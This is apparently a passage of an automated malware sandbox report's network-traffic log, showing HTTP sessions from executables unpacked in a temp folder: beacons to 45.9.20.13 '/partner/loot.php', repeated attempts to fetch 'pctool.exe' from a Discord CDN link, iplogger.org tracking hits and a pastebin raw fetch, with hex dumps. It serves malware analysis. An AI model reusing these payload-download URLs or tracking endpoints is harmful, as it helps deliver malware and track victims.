                                      45192.168.2.46011545.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:01:01.863835096 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      46192.168.2.46011845.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:01:06.001876116 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449736162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:10 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:57:10 UTC1047INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:10 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=AfndMd6V.01zjDiumP1PeZVw9D3mvKbYwSxt1mf4OCc-1724230630-1.0.1.1-Su3GzT_pD9Fd2iir70fJfh6iPQXBLIjlmncMkZj1espOH5eZjMkNvoYB2y22bW8fmUFV3kaNOu3P1T1jJXDenw; path=/; expires=Wed, 21-Aug-24 09:27:10 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbZHdRtMfj5bkjpOb%2FzbDVaL5UULNkIIWIl%2FXd449UHwSnz7ZV0luAlfszeirf7ZADcAxCHGgmAjuL2JC5gAPhfupHzk5XCQy7BGQfaT4gLz4L3caoPdoR4rzuDW9v0781jT%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=kDH.E_8UF2IoEITcXP_U.dJxTq9jfJMUGZtrXg380is-1724230630799-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a026e8f43cb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:10 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.459938172.67.132.1134438136C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:15 UTC87OUTGET /1a2jd7 HTTP/1.1
                                      User-Agent: m1011
                                      Host: iplogger.org
                                      Connection: Keep-Alive
                                      2024-08-21 08:57:15 UTC1018INHTTP/1.1 200 OK
                                      Date: Wed, 21 Aug 2024 08:57:15 GMT
                                      Content-Type: image/png
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      set-cookie: 30189073137263905=3; expires=Thu, 21 Aug 2025 08:57:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                      set-cookie: clhf03028ja=8.46.123.33; expires=Thu, 21 Aug 2025 08:57:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                      memory: 0.42942047119140625
                                      expires: Wed, 21 Aug 2024 08:57:15 +0000
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      strict-transport-security: max-age=31536000
                                      x-frame-options: SAMEORIGIN
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xkL5k8z2m3SoN%2F9FaOo5qbfyhxrY4V2hgWTyr08BEejMHl6DqRRaxeCfYPszhOmslXDsly5CkaCNRFbk5gLQL1FGG4gt22BnnuXCYY51YZLCYaCXTedAMubl4vMWTU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8b696a1daaddc32a-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:15 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                      Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                      2024-08-21 08:57:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.459940172.67.132.1134438136C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:16 UTC44OUTGET /1a3jd7 HTTP/1.1
                                      Host: iplogger.org
                                      2024-08-21 08:57:16 UTC1029INHTTP/1.1 200 OK
                                      Date: Wed, 21 Aug 2024 08:57:16 GMT
                                      Content-Type: image/png
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      set-cookie: 30189074137263905=3; expires=Thu, 21 Aug 2025 08:57:16 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                      set-cookie: clhf03028ja=8.46.123.33; expires=Thu, 21 Aug 2025 08:57:16 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                      memory: 0.41204833984375
                                      expires: Wed, 21 Aug 2024 08:57:16 +0000
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      strict-transport-security: max-age=31536000
                                      x-frame-options: SAMEORIGIN
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCt1LwJOv23g3JuLRAH6h5dy%2BoMOFzod12dDZKVm%2BOw389xnQfodtAqesLlKzo1onuK%2FoM5ddGBWT5RF7%2FWThF8aDbLLIwE6o%2F4HgAGsH%2Bjo%2FTby1cmUi7ZG5av%2FmzQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8b696a23ce7b4333-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:16 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                      Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                      2024-08-21 08:57:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.459942162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:16 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:16 UTC1047INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:16 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=Kf_VuceftkvZS0FPH4WUMRZQURdya_GLHzNI1zvjHyM-1724230636-1.0.1.1-r6Il9KxaCq4ZRPwxn7frVCAmPRFFrRIet8wSmHS7UwqEFeO.eFnUGttWsgmoF89kEnbFkHu4a2Xfeqd0nD_tgQ; path=/; expires=Wed, 21-Aug-24 09:27:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c9nez5obEMfbTn%2FXz243fxrIEoQqCXBEQheCbzHAITsf1sn58gbIwuBEI4h%2FZV8qZnKMYI4d1LgounAhGDgly8B18ltQE3UpfziRx1msT0kJwjl7mlueSuTOdRPsHQelIp%2FJOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=jD4ZsvDd9vq70OPT5ILhDKCp_PeGb1kJS__E3NpTPVo-1724230636877-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a286c9719c7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:16 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.459953162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:22 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:22 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:22 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=Vb4tNUszopoTKlKZCyzIQ9nbpFwgczMDsqzQz8Lfd.k-1724230642-1.0.1.1-7WwYIHnoE16UQljoMR6Qdu2Mc4CtrUDFK1zWrNEw99aK8F5Y50NaFU.79cEBagC9yQhQc2LNRnliFJPytWZxdg; path=/; expires=Wed, 21-Aug-24 09:27:22 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2B57LjwBbRJhiB%2B1yzh7MCmOVtH6mvDA6KF4v7IT4u7XR08Cpx6HZJAYKBja3BNHdC2y8ef5qy4p1Upavx6WfUg0G%2FcwHRjZAGpd23vdUdu42qfKAjHxnvQ8BB1mGh%2BEAOp1CQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=jJ_Aw6TKVgt4IWYlzPJYjZGyv5xjbxbQZx1WLIOYJSo-1724230642543-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a4bdec00f49-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:22 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.459962162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:28 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:57:28 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:28 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=rZ7VWVJTnKf5y6.8joyi_H0Z5j1_BcfGYSJpVIVcctw-1724230648-1.0.1.1-5TrN5OUCfTgRyoFnROqZ4O2Djew7SRKAZCsl8oGLCiv6WAhsD0uU884paD5iaTCSLvaVpCVyDzbcW4wH1uupdw; path=/; expires=Wed, 21-Aug-24 09:27:28 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yNyXCoxmfQjMYFr8wsYPf9IbqjpNKW3EJ2donBl4tCl%2BpCf89%2FSV2aNZ7zV0EqDqMDosm7eVtP524Nb2c8r60jTdkSKB1rR1J%2BJXcade%2FseV%2FqllNN9ph06g2MkOdPsdInfCiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=lkblbI.hdcugeqnkS.eoRPCLlkfg5IFBgzT7nhXC8Ko-1724230648181-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a6f181ac351-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:28 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.459963172.67.19.244437996C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:29 UTC202OUTGET /raw/A7dSG1te HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                                      Host: pastebin.com
                                      2024-08-21 08:57:29 UTC439INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-frame-options: DENY
                                      x-frame-options: DENY
                                      x-content-type-options: nosniff
                                      x-content-type-options: nosniff
                                      x-xss-protection: 1;mode=block
                                      x-xss-protection: 1;mode=block
                                      cache-control: public, max-age=1801
                                      CF-Cache-Status: EXPIRED
                                      Server: cloudflare
                                      CF-RAY: 8b696a74afdf423f-EWR
                                      2024-08-21 08:57:29 UTC698INData Raw: 32 62 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 30 2e 37 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 73 74 65 62 69 6e 2e
                                      Data Ascii: 2b3<!DOCTYPE html><html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.
                                      2024-08-21 08:57:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.459969162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:33 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:33 UTC1053INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:33 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=M2uO.1.PcACkGnZDsgrNCqmml2zVXqHzFQvKKBacpSE-1724230653-1.0.1.1-60ojZuLVEcG3c8NHRxN.kUPyVvY4lkWE8h.R3nFJlOGji1V1eG0dr04KsPo0x8EGiIZJEbBm2_IFicXSgatNJQ; path=/; expires=Wed, 21-Aug-24 09:27:33 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5zS7bLFu2w%2F3FjwhMtksCi95i9UdTj10Kpdjk4T4TpLyI9x%2BIlDta1f07Mq%2ByIfaV3YzANid1AtSyqIP9XP%2BSeouYUMnr36XVJYY7%2BmnLiLxvNhid7QrGNlAdrMZFbJopflaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=g9cXa5aXWK95l.pZHUJh2luNMN6BxuFKyqIoO4XsDN0-1724230653839-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a925f6c4211-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:33 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.459972162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:39 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:39 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:39 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=eTOcN338iJPkKWDX6.nqa3zwWV0DsGurA5C3Yed6Zbs-1724230659-1.0.1.1-HSbqEhkiw1hJfJNcwXZieyCfMT0PwXC8nw1p.Aws4Yo0k3htruQKM9ZgN.sCUh0SCFELZd_GgIrqHkjST_HJqg; path=/; expires=Wed, 21-Aug-24 09:27:39 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVmRX5scst0fCvz0F%2Fk4JYIFD3K5UoJaUDUaKjxec53vGYufIR%2BX0HukOGHMZRijQmppVMZFtuJJoaBlm0pnLScyew09CYruop9DSYVwU5Gz%2F%2BgKyP0ycgAY3Wil9efdk%2BSdjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=EXI_dRZVnDascO6a90jw3WVKoDmPE5WUxcaB86l5mtQ-1724230659453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696ab58ccd41d3-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:39 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.459975162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:44 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:45 UTC1053INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:45 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=8CVcyNZfC9nOorg38LU1pIJKYi5MqrmMXhCIT.F3fg8-1724230665-1.0.1.1-HXsEZewA7LjPb8P483nbiINrFDOR2v56uHdlA0kyEgBUUXyxo8SjvdLwPlO0dXl1alUmvt2q6lTKMb8XS.vg6g; path=/; expires=Wed, 21-Aug-24 09:27:45 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGSIgPvvOdZ2T5qPQiexELLUhfyXkNGS619xCBK%2FmbWeb7Z90KTrPL8tu%2BUzlvq%2Bv4ZTlsf2zd4eTPAimkWG8bXAQ%2FwMrUDUclYy%2BO8Xb0RAjE3O6dE5uJAkKP%2Fp20AYQBPLhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=FyAm59iaq4RnfE_eCoL4GeouO89J4T.7q_QY667W6BE-1724230665079-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696ad8a92d7c96-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:45 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.459978162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:50 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:50 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:50 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=qU8rfA7XdmwSG5ysqqfRhYa0c5m0eTknlyPuY_X2Zc4-1724230670-1.0.1.1-aifQIHyl1IKHGCBxL30n0hpAvqvV2qItjnuTsTJRkyiHf14__klbUNOXwSphO8IAzAGrZMiBlNThUx99s5WHTw; path=/; expires=Wed, 21-Aug-24 09:27:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tqlj64OpuItPLuokibqTvasX99m19tzptAxCizZM1%2FsLfopaUum0CMiQU6%2FHtFqxbVCmC3RXu%2FeKb%2FOKVXT3hWp149CVzS9qoEAhui7MJb9Gajl6gmNrmzSCuxt4U6GV6bZZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Ia86BkihzpSWVNbCkYJjIxbAuDBLdLrrD9.E_HB4N8Q-1724230670843-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696afcb9227ca5-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:50 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.459983162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:57:56 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:56 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:56 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=6zuegI48FEcVXZfst96HdNFv3TSFNVQwFsPOqjTjm6g-1724230676-1.0.1.1-hGy1ywwrTckLgTjC26D6_F.xZwY0uh5hzm0UkHi9PHKJVTLj0Gvku2r29PHELhoJzbsqaKi0bf6H0gorhGoZqQ; path=/; expires=Wed, 21-Aug-24 09:27:56 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPoepVex4tK3GckkvYZLrn%2BXW4aB5tlxtZejxSeqd34%2FiHTfeIKl%2BpJZghmXz5xTae0gLtpJluBOK3OD6emk6GtaSht3QU6C6pLKvjSEG%2BZQetWa4IEomiUhs0G9HedxENq0qQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=cGD49sxET8z.WKWEjwxrS_ZECHJh9v4zpLMJHiP7KNI-1724230676489-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696b1ff87e4319-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:56 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.459988162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:02 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:02 UTC1045INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:02 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
